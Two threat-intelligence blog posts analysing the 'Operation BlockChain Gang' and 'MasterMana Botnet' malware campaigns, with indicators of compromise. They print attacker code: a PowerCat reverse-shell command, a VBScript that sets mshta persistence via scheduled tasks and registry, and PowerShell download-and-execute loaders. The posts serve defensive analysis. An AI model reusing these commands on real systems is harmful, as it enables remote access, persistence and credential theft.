BLOG

Friday, November 15, 2019

Threat Summary: Operation BlockChain Gang; Advanced Exploits, Commodity Tools


This is Prevailion's first Threat Summary Report. For more information on this type of report and why we publish them, click here.

Authors: Danny Adamitis and David Maynor


Executive Summary



The research team at Prevailion has detected and analyzed Linux and Windows remote-access trojans associated with the advanced threat actor known as “HydSeven.” This threat group initially maintained a relatively low profile through the use of bespoke commodity malware. However, they caught the attention of the information security community when performing a highly targeted spear-phishing operation in the summer of 2019. 


In this campaign, which we have dubbed “Operation BlockChain Gang,” the threat actors used compromised Cambridge University infrastructure to phish and water-hole their targets. In analyzing the campaign, Prevailion has associated two new malware families to this group. In addition to the previously known Mac OS X agent, we’ve recently analyzed the Windows and Linux variants.


By illustrating how potential victims could have been infected by the group and detailing the capabilities of the malware, this report is intended to inform at-risk organizations and help them understand appropriate steps to avoid compromise.


Campaign Overview 



HydSeven appears to add a new twist to a common method of infection via email, known as “phishing.” While this particular technique is not new, victims rarely report actual interactions with threat actors. In this case, the threat actors crafted an innocuous email asking if the target would be willing to look over some applications for an award presumably in their area of expertise. In a statement about the attack, CoinBase reported, “We learned that over 200 individuals were targeted by this attacker.” 


It wasn't until after the victim responded, indicating that they would be willing to help, that they were sent the malicious link. That link would bring the victim to a threat actor-controlled “watering-hole” hostname on the Cambridge University domain. If someone visited this website from a Firefox browser, their host machine would be exploited by what was a 0-day exploit, later identified as CVE-2019-11707 and CVE-2019-11708. However, the actors did appear to make one small mistake at first; they did not add a message saying that the webpage could only be rendered in Firefox. Thus, some potential victims were saved from compromise simply because they used their default browser. If someone was unfortunate enough to have visited the website using Firefox, they would have been exploited, and an agent would have been deployed to their workstation. 


While other researchers have previously documented the functionality of the Mac OS X payload, Prevailion has, with moderate confidence, associated a Windows and Linux component to this threat actor. We speculate that the threat actors likely did not go through the effort to obtain certificates for Mac OS X and Linux payloads, as those systems are less likely to have antivirus software running on them. These payloads were fully functional remote-access tools that allowed the threat actors to run commands, as well as send and receive data from their command and control servers (C2s).


This case study shows the lengths these advanced actors would go to establish access in a high-value network. Based off that same CoinBase report, it was calculated that only 2.5% of people who received the initial email received that final link. This would suggest that the threat actors expended all this effort to gain access to approximately five organizations, potentially in the financial sector.   


This report highlights the emphasis that threat actors are placing on organizations that store and retain significant amounts of data about their customer base. We strongly encourage these organizations to assess their existing risk profiles, implement host-based defenses, and put incident response plans in place prior to an event. 


Initial Contact



According to a presentation given in October 2019 by a Line employee, potential victims of this campaign received a targeted email from a compromised Cambridge account asking them to “assess the quality of competing projects ... for the [Cambridge University] Adam’s Prize.” The Adam’s Prize is a highly respected contest, held every year by Cambridge and awarded to a person, or persons, who contributed original research to a given discipline, typically within the field of mathematics. 


The initial email appeared innocuous at first glance, asking recipients if they would be willing to help evaluate applications for the Adam’s award. These threat actors even went through the process of creating a LinkedIn account for the persona that sent the emails. While creating a fake profile has become typical of targeted attacks, corresponding with the victims was highly abnormal. In this particular case, correspondence went back and forth — with victims inquiring about requirements and terms of participation — but the link to the water-holed hostname was still not sent until the victim agreed to help. This unique tactic reveals that the threat actors are expanding the social engineering aspect and displaying a level of audacity far beyond the norm


The email contained a link with a unique username and password for the victim. The webpage seemed innocuous, with only one suspicious aspect: a message indicating that the page would only work when viewed in Firefox with a link to download the latest version. We speculate that the actors added this particular message after reading an article such as this one, by Robert Heaton. When Heaton visited the water-holed site, he did not get the Firefox prompt. In his words:

if “Gregory” had added just 7 extra words to this page - “THIS PAGE MUST BE VIEWED IN FIREFOX” - I would have been screwed. 


Crossover 
Around the same time, May 20, 2019, CoinBase experienced a similar attack. This was first reported by @SecurityGuyPhil, in a series of tweets. Those tweets were later turned into a medium post, which can be found here


The CoinBase story was identical to what transpired at Line, when victims received emails from a presumably compromised account associated with Cambridge. Only after the user interacted with the threat actor and expressed a willingness to help did they receive the malicious link. If the victim visited the water-holed website from a Firefox browser, it would call a malicious javascript file from the domain analyticsfit[.]com/init.js that was hosted on the IP address 54[.]38[.]93[.]182.


The Firefox Exploit 
Once the victim clicked on the link or visited the website with the correct browser and operating system, it would trigger the malicious javascript hosted on analyticsfit[.]com. The first exploit, CVE-2019-11707, allowed the program to crash in a certain way, which was discovered and documented. The second exploit, CVE-2019-11708, would allow remote code execution on the compromised victim’s machine. Both CVEs were reported by Samuel GroƟ of Google Project Zero. On his Twitter account, Samuel stated the following about the vulnerability:


“So all in all this looks like a bug collision (not a 1day constructed from the bugfix, not a leak from any of the bug trackers). My guess is that someone was looking for that bug pattern or even specifically for a variant of CVE-2019-[9810] and found the bug that way”


Based upon Prevailion’s analysis, the exploit would not allow for remote code execution on Chrome due to Chrome’s use of a different JavaScript engine. 


Mac OS X Agent



Once the exploit was run, the code would obtain the first-stage agent from the C2 server, located at hxxp://185[.]162[.]131[.]96/i/IconServicesAgent. This agent was analyzed extensively in a series of blog posts by Digita Security, in which it was identified as a variant of “NetWire.” A commercially available “systems administration tool”, NetWire can be purchased online at a rate of $120 per year. Despite its low cost, cracked versions of this software are also available to download for free on the internet. 


Of note, while NetWire is commercially available, the sample had a low detection  rate when originally submitted to VirusTotal on June 2, 2019. At that time, it was flagged as malicious by only one vendor. Since then, though, several companies have created signatures for this tool. In the course of our investigation, we identified two new samples associated with this group. Interestingly, one was named “fuck_tencent” — potentially a reference the Chinese conglomerate Tencent Holdings Ltd.


Once installed on the victim machine, the application masqueraded as the “Finder” application. It then attempted to gather host-based credentials and establish persistence. After gathering host-based information and presumably determining that the environment was of interest, it would install the second, more robust payload, later identified as “Ekoms”. Digita Security performed an extensive write-up on this sample, as well, which can be found here


Like most second-stage remote-access trojans, it would allow the threat actor to deploy keyloggers, grab screenshots, transfer files, and send audio captures. As with the previous tool, when this sample was submitted to VirusTotal, it was not flagged as malicious by any AV vendors. Initial detection rate for the Ekom sample was 0/53 when uploaded on June 20, 2019


Analysis of Linux Agent



During our investigation, the Prevailion team found three elf files designed for Linux-based operating systems. Like most of the Mac samples, when the file was initially uploaded to VirusTotal, it had a detection rate of zero. And, even as of November 10, it's only being detected by three vendors. 

Initial detection rate of 0/53 for the Linux agent uploaded on March 29th, 2019

The first agent we analyzed was a fully functional remote-access trojan designed for Red-Hat Linux. We hypothesize that the infection mechanism was similar to the one used to deploy the Mac OS X agent. Once the agent was sent to the machine, it would install itself as a desktop application.

Screenshot of the RC4 embedded within the sample

As in the aforementioned Mac samples, it contained the same RC4 encryption key, used to decrypt a section of code containing the C2 IP address, Host-ID, and Default Group that would be set by the threat actor.

Decrypted output of the encrypted code

When we analyzed this agent, it would gather the machine’s current IP address by making a request to checkip[.]dyndns[.]org. The agent had the ability to gather information about the victim machine and send various commands. Some examples include retrieving:  

  • Information about the user (getuid, getpwuid)
  • Information about the host (gethostname, sysinfo, sysconf, cpuinfo) 
  • Information about environment variables (getenv)
  • Information about process and the parent process
  • Run commands (from /bin/bash or /bin/sh)
  • Read, write, and delete files
  • Make and remove directories 
  • Kill a process 


The agent would persist by auto-starting on login. The functionality suggested its primary purpose was to act as a proxy, or relay, to send commands and data from the threat actors outside the network to other agents within the network. One particular aspect of the agent was the use of a hard-coded user-agent string: 


“Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko”


This was of particular note, as the agent was designed for Linux, but this was the typical user-agent string for a Windows operating system version 8.1 or Server 2012. 


Analysis of the Windows Agent 



While the previous case studies provided insights into how the threat actor performed in the Mac OS X environment, looking at those same C2, we identified another campaign from earlier this year. The two IP addresses referenced in the CoinBase targeting were:

  • 185[.]162[.]131[.]96
  • 89[.]34[.]111[.]113.


Vitali Kremez, @VK_Intel, later noted that he found a signed Windows binary, with the certificate being issued to “SANJ CONSULTING LTD”. Once the binary was analyzed, it communicated with the same C2 as the Mac OS X malware from the CoinBase attack. 


“cmd.exe /c powershell; Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force;. "%s"; powercat -l -p 4000 -r tcp:89.34.111.113:443;                       
goto :loop”


This binary was a compiled version of PowerCat, an open-source framework project written in PowerShell. We have associated additional PowerCat samples with the same threat group. However, they were not signed by a certificate authority. To avoid detection from common strings, they usedan obfuscator such as “Invoke-Obfuscation”. PowerCat is a fully functional remote-access trojan that:

  • Performed upload/download files
  • Performed execution of PowerShell commands
  • Included functionality for DNSCat2 as an alternative communications channel 
  • Acted as a relay to other agents inside the network perimeter


Another notable feature of these agents was their ability to act as a relay. This is significant because once the threat actors have access to a relay on the network behind the firewall, there are typically few, if any, appliances in place to detect the lateral movement of the actor. These relay agents allow the threat actors to access more sensitive data hosted on servers that are only accessible once a client has been authenticated and permitted into the local network. 


Overlap with Previous Campaigns
One other significant element was the use of a common RC4 key across the Windows, Linux, and Mac-based samples. The use of this shared RC4 key and overlapping C2s led us to believe, with moderate confidence, that all these samples can be associated to the same threat actor. This threat actor group has previously been reported upon as being active in both Japan and Poland.  


Mitigations



This threat actor has showcased a number of techniques that would categorize them as an extremely advanced adversary. This campaign highlights the focus on large organizations that store and retain significant amounts of data about their customer base. 


Large crypto exchanges, corporations, and other organizations storing sensitive customer information should continuously assess their risk profiles and employ host-based defenses on their systems. For example, while the Mac OS X agent was initially undetected by AV, the use of a personal firewall — such as LuLu for Mac or IPtables for Linux — would have alerted the user to an outbound connection. And, when browsing the internet, users can mitigate risk by making use of NoScript, a plugin that blocks all Javascript, Java, and Flash unless explicitly allowed by the user. 


While there is currently no single solution to protect every system with 100% fidelity, these products can significantly reduce risk by displaying a pop-up to alert the end user about activity in the background of their system. This gives them a greater opportunity to at least detect abnormalities and potentially avoid a breach. 


Organizations should also work on preparing and rehearsing their incident response plans. Thus, if an event does occur, they will have an established procedure regarding who to contact and what to do. Furthermore, in an incident response investigation, it is critical to check the entire network, not just the machines where an alert was detected. This includes Linux-based workstations and servers, as these systems sometimes get overlooked. If you feel that your Linux-based system may have been compromised, guidelines on how to inspect that system can be found here.    


While it’s important to have a security team on staff, the end user is always your first line of defense to detect suspicious activity. For example, if someone receives an email asking them to evaluate an international award in economics, and they are not an economist, they should consult their network security staff. If you have host-based firewalls in place and a user suddenly starts seeing a pop-up message about a cURL command connecting to a server in Hong Kong, there may be an issue at hand. Training your employees to take these alerts seriously could prevent a major incident from occurring.    


Indicators of Compromise 
The following is a list of samples that have been associated with this threat group. This list is comprised of information from Prevailion employees and the open source community. 


Sending Emails


Exploit Server
analyticsfit[.]com/init.js, 
54[.]38[.]93[.]182.


Mac Agents 
07a4e04ee8b4c8dc0f7507f56dc24db00537d4637afee43dbb9357d4d54f6ff4
97200b2b005e60a1c6077eea56fc4bb3e08196f14ed692b9422c96686fbfc3ad
A2e449364b1bc148a19824984010485e2770a2f2e3098a7b59b557a59f735691
Bff5746b0c9eff2301107d914a1d67ccfc71b1eb1a456592d61309a4656d84b2


Linux Agents
A981a5fbeff782330871fb8a106466cbe61280536c162b3e3c3cbf441265b437
Be71c7c7ad6a46d984cc1726949b4477a076bda024f54e2cbea1453813f4ac6f
f6b9aa26608ca43dec89b71c13a240824ec1e69e835a05ac2c34f284eb824e9f


Windows Agents
1fd4d2b24afe772e9e245ea887e7b7546c0e9d5339cfef78549e8d5b0854502d
Cd822a2aba7d7beaea443ebeb20528a71cb87e0bd0fad3da5b06e69849ea0d57
c5da6266ed74e0a59d250de106d9885ea6a4088beb15b70415de9703e9041ad4
Ce422218406c1fb31b4b959584d2e655a405e210d0055b6b5aa5b87ff81276f2
7e3378e55e49f93bc1cbe111f65faa89ed0b6765af411bf21547f5a3c909a06f
5fcc28c618d0338944cae76e3df9ad50e579f265e4b44296506f6cfd05faec95
38884986e530050311f8ceb59a84b0a5fa99034233fe8b2c4e24febe9798cd5f
0499aa5c68c59d2d3a484d52d7f1afcc189722ae96dfdde2afd9e12c95085af4


IP Addresses
185[.]162[.]131[.]96
89[.]34[.]111[.]113
172[.]224[.]166[.]104
101[.]78[.]197[.]252
51[.]255[.]86[.]55
185[.]49[.]68[.]193
81[.]4[.]122[.]139
89[.]34[.]111[.]113
185[.]49[.]68[.]192

Wednesday, October 2, 2019

MasterMana BotNet

The MasterMana Botnet: Anatomy of the $160 Dollar Hack
Authors: Danny Adamitis and Matt Thompson


Introduction


The team at Prevailion has uncovered new details concerning “MasterMana Botnet,” an ongoing cyber-crime campaign that hits all of the cyber bingo buzzwords: business email compromise, backdoors, and cryptocurrency wallets. There are indications this operation — which targeted corporations around the world for less than the cost of a night at the baseball park — was still active as late as 24 September 2019.

This operation, which began as early as December of 2018, appears financially motivated, given the seemingly indiscriminate targeting of business email addresses via phishing and the inclusion of specific functions to steal information associated with cryptocurrency wallets. Based upon exhibited tactics, techniques, and procedures (TTPs), we have associated it — with moderate confidence — to the “Gorgon Group”, a well known group active for numerous years that has been known to straddle the line between cybercrime and intelligence operations.

Once the victims opened the phishing email it revealed an infected document attachment. Opening the infected document initiated the attack’s multi-pronged, labyrinth-like kill-chain. The layered kill-chain approach aids in evading detection by relying upon trust placed in a number of third-party websites and services, such as Bitly, Blogspot, and Pastebin, as opposed to exclusively using actor-controlled domains.

The threat actors also took the additional steps of modifying older Pastebin posts to cease execution, as well as adding features to avoid some automated detection, such as sandboxing.

Ultimately the victim would download a .NET dll that would perform process hollowing and load a fileless backdoor — either a variant of Azorult or Revenge Rat. The team at Prevailion determined that the threat actors used Revenge Rat, a well-known remote access trojan (RAT) tool that could be found online for free, through the week of September 15th, at which time they switched to Azorult, a well-known trojan previously for sale on certain forums for $100US.

The Azorult trojan was designed to steal usernames, passwords, cookies, web history, and cryptocurrency wallets. It also created with contained functionality to enumerate the host, upload files, download files, and take screenshots of the victim’s machine. This functionality could allow an actor to deploy additional payloads, such as cryptominers and ransomware.

In addition to aiding in detection avoidance, using third-party services also enabled the threat actors to conduct the campaign at minimal cost. Leasing Virtual Private Servers (VPS) costs an estimated $60US, and Azorult versions were available for under $100US via Russian-based cyber-crime forums earlier this year.

This particular campaign highlights the asymmetric nature of these threats. As companies increasingly spend more money on security solutions, threat actors are able to operate on shoestring budgets. In this case, the threat actors struck a perfect balance: sophisticated enough to avoid automated detection through third-party services and obfuscation while remaining below APT-level sophistication to avoid drawing attention to their campaign.

These new details about the wide-scale targeting of this ongoing campaign — dubbed “MasterMana Botnet” — highlight the potential impact of moderately sophisticated campaigns to all corporations and organizations. While most companies fear they may become compromised by advanced actors, this particular report highlights that actors do not have to rely on advanced tools or techniques to have a serious business impact.

We recommend a defense-in-depth strategy with multiple security solutions including properly configured firewalls, email protection, and end-point antivirus solutions.

While the infection mechanism relied upon semi-trusted third party sites, the use of commonly available backdoors made this attack easy to stop for updated and properly-configured endpoint solutions.


Campaign Walk Through 



Step 1 - Phishing E-Mails

One observed infection vector used by these threat actors was trojanized Excel documents sent to victims via email. The emails appeared to impersonate business dealings by sending the recipients invoices and product requirements.

In one case, an email impersonated a small-sized legitimate company based out of Dubai, UAE. Both of the emails that we discovered were sent from free email providers, such as Yahoo and Yandex.

 



Phishing email sent from free webmail provider to potential victim




Phishing email sent from a potentially compromised account 




Step 2 - Infected Document Attachments

Once the victim received the email, presumably they would then download the infected file attachment. In one case, the Excel document attachment would prompt the victim to then enable a macro. Once macros were enabled, the VBS script would reach out to a Bitly link.

In another instance, a different Microsoft excel file was attached, which used the Dynamic Data Exchange (DDE) exploit, CVE-2017-11826. Similar to the previous sample, when the document was opened, the OLE object automatically reached out to an embedded bitly link.

Additionally, we saw references in the code that indicated the threat actors could have trojanized the following Microsoft file formats:
  • Word
  • Excel
  • PowerPoint
  • Publisher


Step 3 - Bitly Link Redirection to “TeamMana” Blogspot

The victim machine would then attempt to resolve the embedded Bitly link. Once the link was expanded, it would direct the victim to an actor-controlled hostname associated with Blogspot.

The team at Prevailion observed the same hostname in use across multiple campaigns however, the expanded bitly links correlated to different URLs. One of the more popular campaigns occurred in late August and continued through September. This particular link appeared to have been clicked approximately 2200 times from end users located around the globe.
 
Bitly metrics showing the number of times the link has been clicked associated with the September 9th Campaign




Bitly metrics showing the number of times the link has been clicked associated with the September 15th Campaign

Once expanded, the Bitly links would bring the victim to a URL associated with the hostname myownteammana[.]blogspot[.]com. If the website was visited in a web browser, the site appeared benign. Upon further inspection, however, we discovered the presence of malicious JavaScript within the webpage.

Screenshot of the actor-controlled blogspot webpage 

Once the embedded javascript was decoded, it revealed a VBS Script that ran mshta.exe on code found on a Pastebin URL.


Step 4 - Creating Scheduled Tasks and Registry Keys

The Pastebin URL would reveal another javascript snippet. Similar to the previous step, the Pastebin file was a URL-encoded VBScript that was obfuscated using some simple tricks such as string reversals and unnecessary concatenations to avoid detection. Once deobfuscated, the script would kill any running instances of MS Word, Excel, Powerpoint, and Publisher.

Next, it would attempt to create scheduled tasks and modify a registry key to obtain the next payload. One interesting aspect was the inclusion of a time delay on the scheduled task, which likely aided in avoiding detection from a certain sandbox environment that may have had a timer of five minutes

At the end of September, the threat actor began modifying their TTPs to use three scheduled tasks and one registry key, instead of two. These scheduled tasks would kick off after six minutes then five hours and then ten hours. Then, the registry key instance would persist after a reboot.


<script language="VBScript">

CreateObject("WScript.Shell").Run "cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit", vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 06 /tn ""Windows Update"" /tr ""mshta.exe http://pastebin.com/raw/{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 300 /tn ""Update"" /tr ""mshta.exe http://pastebin.com/raw/{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").Run schtasks /create /sc MINUTE /mo 600 /tn ""Genuine"" /tr ""mshta.exe http://pastebin.com/raw/{Specific URL}"" /F , vbHide

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate","mshta.exe http://pastebin.com/raw/{Specific URL}","REG_EXPAND_SZ"

Self.close </script>


Step 5 - Downloading and Loading the Trojan

Once the scheduled tasks and registry keys were created, they were then populated with the contents of another Pastebin URL. Interestingly, our team noticed that some of the older Pastebin posts were modified to cease execution of the kill-chain.

We assess that these older Pastebin posts were almost certainly modified by the threat actor, potentially after a set period of time. This suggests that the threat actors are taking steps to remove older links, thereby protecting their tools and operations. One of the active links provided a URL-encoded string that decoded to the text below.

Screenshot of the URL decoded VBScript 

That PowerShell command was obfuscated by both reversing the order of the string and by expressing in comma-delimited, base-10 CharCode.

One of the tools that we used in decoding these various commands was CyberChef.

Screenshot of the cyberchef, using “reverse” and “from charcode” modules to deobfuscate the script 

The plaintext PowerShell script used in the September 15th campaign can be viewed below.

[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');

$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/{Specific URL}')|IEX;

[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'hxxps://pastebin[.]com/raw/{Specific URL}').replace('!#@','0x')|IEX;

[k.Hackitup]::exe(notepad.exe',$f)

Prior to the 15th, the threat actors used a slightly modified script. This older variant had certain functionality to confirm that the machine had access to the internet before running. The variant also used MBuild.exe. We suspect the adversary chose MSBuild because it is a signed Microsoft binary, and using this process could allow them to bypass some application whitelisting controls on the host as they used it to execute arbitrary code.

do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');

$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/{Specific URL}')|IEX;[

Byte[]]$f=[Microsoft.VisualBasic.Intraction]::CallByname((New-ObjectNet.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://pastebin.com/raw/{Specific URL}').replace('#!','0x')|IEX;

[email protected]('MSBuild.exe',$f);

$g22=$a.GetType('THC452563sdfdsdfgr4777cxg04477fsdf810df777');

$y=$g22.GetMethod('retrt477fdg145fd4g0wewerwedsa799221dsad4154qwe');

$j=[Activator]::CreateInstance($g22,$null);

$y.Invoke($j,$obj)

The first Pastebin sample downloaded from the script was heavily obfuscated. Once it was URL-decoded, it revealed a PowerShell script that was obfuscated using base-10 CharCode. The deobfuscated text revealed another large string of hex characters. However, to further evade detection and obfuscate the code, the “0x” that typically precedes the hex was replaced with “%_”. The PowerShell would replace, ”%_” with “0x” right before execution. Once the replacement was complete, we were able to extract a Dynamically-linked Library (.dll) written in .Net.

The second Pastebin sample we downloaded from the script was more semi-obfuscated. Similar to the previous samples, the threat actors appended “!#@” in front of the hex characters, likely to evade detection. However, prior to execution, the string “!#@” would be replaced with “0x” to download a fully functional RAT.

Step 6 - Analysis of the Process Hollower and Trojan

The .NET dll sample associated with this particular campaign was obfuscated using an open-source project called “ConfuserEx” from GitHub. Thankfully,“de4dot” is another available open-source project, which can be used to deobfuscate the samples.

This serves as a hollow process injector for the “notepad.exe”, from step 5 above. It also passes a byte array with the PE data from the PowerShell script. It looks for notepad.exe in windows\syswow64 and then calls “MyVictim.tickleme”, which zeros the PE headers from the buffer and calls VOVO.FUN.

VOVO.FUN then launches notepad, unmaps the existing section, allocates a new buffer in the notepad process, writes additional payloads into the process, and resumes the thread. This allowed the threat actors to never write the malware to disk. The actors maintained persistence schedule tasks, which will periodically grab the injector and RAT, and hollow out the memory of a process that points to a valid image on disk.


Screenshot of the process hollowing dll

In an operation that occurred on September 9th, 2019, the threat actors deployed Revenge Rat. 
 
This particular agent communicated with a duckdns domain, hxxp://speeddfox[.]duckdns[.]org, and it generated a MUTEX string, named "WindowsUpdateSysten32". These characteristics, such as the use of Revenge Rat and the MUTEX string, allowed us to draw parallels to a campaign previously reported by other security firms, that they associated to the “Gorgon Group”.

Screenshot of the Revenge Rat’s C2 and MUTEX string

Approximately one week later, on September 15th, we observed an evolution of TTPs, using Azorult, in lieu of Revenge Rat. Azorult was a well-known trojan, and this particular variant was written in Delphi. As noted by other security researchers, Azorult has been available for sale on Russian forums at prices ranging up to $100US.

While this trojan may have been older, it was still highly effective. Most of the functionality was geared towards harvesting credentials that could be found on the victim machine — e.g., email accounts, messengers applications (e.g., pidgin, psi+, telegram), web cookies, browser history, and cryptocurrency wallets.

Functionality to harvest cryptocurrency wallets 

It also had traditional trojan functionalities, such as host-based enumeration and the ability to upload and download files, as well as take screenshots. Once the trojan had obtained the information, it would then communicate with a hard-coded IP address; two such C2 were hxxp://216.170.126[.]146/2ky/index.php and hxxp://23.249.163.135/index.php. We assess that these threat actors likely configured their C2s using another GitHub Project.


Pastebin Insights 

A review of the open-sourced insights from Pastebin provided a couple of interesting takeaways and insights into this campaign. 

The threat actors’ use of third-party websites, such as Bitly, Blogspot, and Pastebin was likely done to evade detection, as those sites would have been less likely to arouse suspicion from network defenders. Yet, websites such as Bitly and Pastebin keep metrics on how many times a certain link has been visited, We were able to determine who created this particular Pastebin post and summarize how many times it had been visited.

For example, we observed that the URL that hosted the Revenge Rat sample had been viewed over 3300 times. This suggests that there are 3300 machines that were affected by this campaign. However, because the threat actors used a known trojan, the number of machines affected could be much lower, as many machines may have had antivirus products in place.

 
Pastebin URL ending in “LJV1Hn3g” which decodes to Revenge Rat


Pastebin URL ending in “xAnP1Xjc” which decodes to Azorult Rat

We noticed that, six days later, the same Pastebin creator “hagga” created a new post that decoded to the aforementioned Azorult trojan.

With a little over 1000 views, if these two operations are representative of a standard week, we surmise that these threat actors potentially interacted with approximately 2000 machines per week.

While this number likely does not reflect the number of actively compromised machines by this threat actor, it does provide us with a snapshot to better understand the breadth of their operations.

Upon further inspection of the Pastebin creator “hagga”, it appears that this Pastebin account was created on December 3rd, 2018. Thus, we suspect this activity has been occurring since that time.

We also discovered one interesting Pastebin post title: “MasterManabots-all-bots”. From this, and the reference to “Mana” in the blogspot hostname, we suspect the actors refer to this campaign as the “MasterMana Botnet”.

Screenshot of the Pastebin post ending in “cUcUDfLf” called “Mastermanbots-all-bots”


Conclusion 


We found two aspects of this campaign particularly interesting:

  • The cost for the threat actors to deploy and maintain the campaign was virtually nonexistent.
  • The campaign showed a very specific level of sophistication, tailored intentionally to evade detection.
Regarding the low monetary cost associated with this campaign, we observed that the threat actors leaned heavily on various third-party services.

For example, they sent malicious documents using free web mail accounts. They then could have used an open-source project to generate a DDE payload or macro and had the macro reach out to a Bitly link. This link then resolved to a free Blogspot site, hosted by Google, which redirected to various Pastebin sites. Finally, they used an older trojan that likely cost approximately $100. Thus, the only real cost associated with this particular campaign appears to be that of leasing the VPSs.

Based on the level of sophistication displayed in this campaign, we believe that the threat actors struck a sweet spot. The longevity of this campaign can be partially attributed to the threat actors’ ability to avoid using popular commodity malware, such as Emotet. Simultaneously, they avoided the use of (and subsequently, the potential burning of) zero-day exploits and custom backdoors. We speculate that this helped them obtain a higher return on investment, since they weren’t spending significant resources on tools and exploits.

This campaign’s threat actors saw an opportunity and appear to have carved out a nice niche for themselves.

We suspect that this particular threat actor is likely to continue operations, as previous public reporting has not deterred them, therefore we wanted to highlight their new modus operandi, so that network defenders may more easily identify their operations.


About Prevailion

Prevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation and business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion provides confirmed evidence of compromise for customers and their partner ecosystems.

To learn more about Prevailion, visit prevailion.com.


Indicators of Compromise

Campaign 1 - Revenge Rat (September 9th)

Email:860f4ede365d905d5f4cef1deb4a7f40c09a20a1fafc856f4230a10509d42a7a

Xls File:680056b56c29afcce275de93ac5bb06076358410c05caae7f19572909d2d6071

hxxp://bit[.]ly/kasls71a

hxxps://myownteammana[.]blogspot[.]com/p/speedfox.html

hxxps://pastebin[.]com/raw/RTD3sGkM

hxxp://pastebin[.]com/raw/avT9WX4c

hxxps://pastebin[.]com/raw/sDC029Je

hxxps://pastebin[.]com/raw/LJV1Hn3g

C0878de0c284e2d7fff24672b6bd80d315222bc50a949426401304bd77f56eb7

E22d550423f05eb685ad060a71d58b306e31c473d2d0cacf5794ec424fd3f393

hxxp://speeddfox[.]duckdns[.]org


Campaign 2 - Azorult (15 September)

eml:2a58061f53a79581ebc02ec7ab3403fae374f13e3ae6d1e6f1552db51d93330e

xls:eb9a9e0e00393b0eb5f128e56674609244dad979fcf69b5aef507f683c016db9

hxxp://bit[.]ly/8hdjkashhassahsh

hxxp://myownteammana[.]blogspot[.]com/p/workfine-third.html

hxxps[://]www[.]pastebin[.]com/raw/BzyHF1Xa

hxxps[://]www[.]pastebin[.]com/raw/f9wKJK8u

hxxps[://]www[.]pastebin[.]com/raw/ztSuJtmu

hxxps[://]www[.]pastebin[.]com/raw/gLH1A2xF

hxxps[://]www[.]pastebin[.]com/raw/c0iMkswD

hxxps[://]www[.]pastebin[.]com/raw/xAnP1Xjc

f6c868883d1d5e4a2049969b4caa8a09fb6818fcf0249e8a1dc3d64372ae4f37

84833991f1705a01a11149c9d037c8379a9c2d463dc30a2fec27bfa52d218fa6

hxxp://23[.]249[.]163[.]135/index.php


Campaign 3 - Azotul (24 September)

xls:4db09db46ba50f3070705ab992ed28a87f861b9ad040176e086b4c9a2bb58210

hxxps://bitly[.]com/mfuckingstlunlayliyabsdhgagaaki+

hxxps://myownteammana[.]blogspot[.]com/p/ahsan-day1.html

hxxp://www.pastebin.com/raw/KbivPSy7

hxxp://www.pastebin.com/raw/piqDdVhA

hxxp://www.pastebin.com/raw/819YBkvU

hxxp://www.pastebin.com/raw/cUcUDfLf

hxxp://www.pastebin.com/raw/7D2ChMmv

hxxp://www.pastebin.com/raw/tvmLvfjx

hxxp://www.pastebin.com/raw/zwPHfSk5

E22d550423f05eb685ad060a71d58b306e31c473d2d0cacf5794ec424fd3f393

Bb077ea088c3c754f89b18c0e33378182b289d34d885e13365a93dc0c7c93589

hxxp://216[.]170[.]126[.]146/ahsan/index.php


Emails (Sha256 Hashes)

dc053f84f2369d6130250bea1aca45f22641af3bd72a628587c4d18dd2903f70

7449d8b0e5c5fee127c7133b6f7662bec21c788311f4c830c320752ebffa3203


Trojanized Documents

D7640b69f2f9d937cf015cfc706c85b4d15af06c0fbfe4421e881ac56c0fbfa9

4db09db46ba50f3070705ab992ed28a87f861b9ad040176e086b4c9a2bb58210

Cabcda5bcbe4e7eb500c8d198910d0c4f067a97f995141b6ae5fb0620e259d93

6040f1565b4b4dccacfa819c424d80611464cc0a7b14cf17a45e4b4eb2b6a276

Eb968161e3c2433aba63517688dc370ef640cf59daa8d658f90c9657c796729b

51a0e2aac8a0d7460e2a326a9c372f3d1ba3871e6f365f122f3d72cd271a5a3b

ed9330c9c926fb40a195f8d4cc1367cc2eb51f384c1dda01d81f209bbd677885

599caa910bc1987be4a9b1128ab909965d91b20bc950b84133c39f05c48e2244

467f6d40cca531ada777d05b9856b4ea16d5596dc8fbc6f9953b08041bdda629

405f5ef0e261f2f7d07db7bf749c5f3ff6cc5a6582013c5490f10dfee24db9cf

Eb9a9e0e00393b0eb5f128e56674609244dad979fcf69b5aef507f683c016db9

7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87

17ef3985f60e587f2ac3fc30ba52106abcd933cd39d9cfd5813e1764ccd8c54e

7d5c10ec72855d6be418dbde4225b413de2d37d02894f9667859c7f5ddcf0f95

160fc09d02379c2975f39fdb2881f702785b898fd526193d55027c1392ad6211

B6caf0e02c8d2cec33d776d0cbda78d4e3cbbf83beef099e74904a56ce5438b2

61640de0f927ccd1835116c9044c825f0ec8d9707cbc9479446137c094c79ec0

5691e36a611c9d26b73280cf2d03b43bb3aad0405c69d12f4e69fa4b84947350

